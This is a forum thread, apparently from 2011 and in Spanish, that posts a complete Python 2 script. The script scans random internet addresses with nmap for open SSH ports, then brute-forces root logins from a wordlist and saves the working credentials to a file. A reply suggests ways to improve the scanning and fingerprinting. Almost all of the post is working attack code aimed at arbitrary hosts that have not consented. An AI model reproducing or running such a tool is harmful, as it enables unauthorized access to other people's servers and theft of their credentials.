SSH BruteForce

@ed33x · Enero 30, 2011, 10:13:43 AM

Código: python

#!/usr/bin/python
#SSH BruteForcer that scans for random
#open ssh ports using nmap and then brute 
#forces them.

#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com

import sys, time, StringIO, commands, re

#Set the successful login file.
save_file = "SSH_Logins.txt"
#Set verbose mode: 1=on 0=off
verbose = 1
#Set the user to use.
user = "root"

try:
	import pexpect, pxssh
except(ImportError):
	print "\nYou need the pexpect module."
	print "http://www.noah.org/wiki/Pexpect\n"
	sys.exit(1)
	
def scan():
	args = 'nmap -iR 1 -p 22 -open | grep open -B 3'
	nmap = StringIO.StringIO(commands.getstatusoutput(args)[1]).read()
	ipaddr = re.findall("\d*\.\d*\.\d*\.\d*", nmap)
	if ipaddr:
	    	return ipaddr[0]

def brute(ip, word):
	if verbose != 0:
		print "Trying:",word
     	try:
        	s = pxssh.pxssh()
        	s.login (ip, user, word, login_timeout=10)
        	s.sendline (command)
        	s.prompt()
        	print "\n",s.before
        	s.logout()
		print "\t[!] Login Success:",user, word,"\n"
		logins.writelines("SSH Login:"+ip+":22 "+user+" "+word+"\n")
   	except Exception, e:
        	#print "[-] Failed"
		pass
	except KeyboardInterrupt:
		print "\n[-] Quit\n"
		logins.close()
		sys.exit(1)

print "\n\t   d3hydr8:darkc0de.com sshBrute/Random v1.0"
print "\t----------------------------------------------"
	
if len(sys.argv) != 3:
	print "\nUsage : ./sshbrute_random.py <how many> <wordlist>"
	print "Eg: ./sshbrute_random.py 1000 words.txt\n"
	sys.exit(1)

num = sys.argv[1]
command = 'uname -a'
logins = open(save_file, "a")

try:
	words = open(sys.argv[2], "r").readlines()
except(IOError): 
  	print "\n[-] Error: Check your wordlist path\n"
  	sys.exit(1)

print "\n[+] Loaded:",len(words),"words"
print "[+] User:",user
print "[+] Save file:",save_file
if verbose != 0:
	print "[+] Verbose Mode: On"
else:
	print "[+] Verbose Mode: Off"
print "[+] Scanning:",num,"ips\n"

for x in xrange(int(num)):
	print "[-] Scanning:",x+1,"of",num
	ip = scan()
	if ip != None:
		print "\n\t[+] BruteForcing:",ip,"\n"
		for word in words:
			#Change this time if needed
			time.sleep(0.5)
			brute(ip, word.replace("\n",""))
logins.close()
print "\n[-] Done\n"

ksha · Febrero 08, 2011, 11:42:00 AM

2 recomendaciones:

1. por que utiliza nmap si puedes conectar un socket a ese puerto y si no tiene el 22 abierto podria ser otro puerto.

puedes utilizar un db como la q tiene nmap para realizar finger printing del ssh.

2.- si es un buen server probablemente te baneen al 3 intento o al primero o quizas ni siquiera te deje logearte ya que utilizan llave publica.

SSH BruteForce

@ed33x

Enero 30, 2011, 10:13:43 AM Ultima modificación: Enero 18, 2013, 05:39:36 PM por 11Sep

ksha

Febrero 08, 2011, 11:42:00 AM #1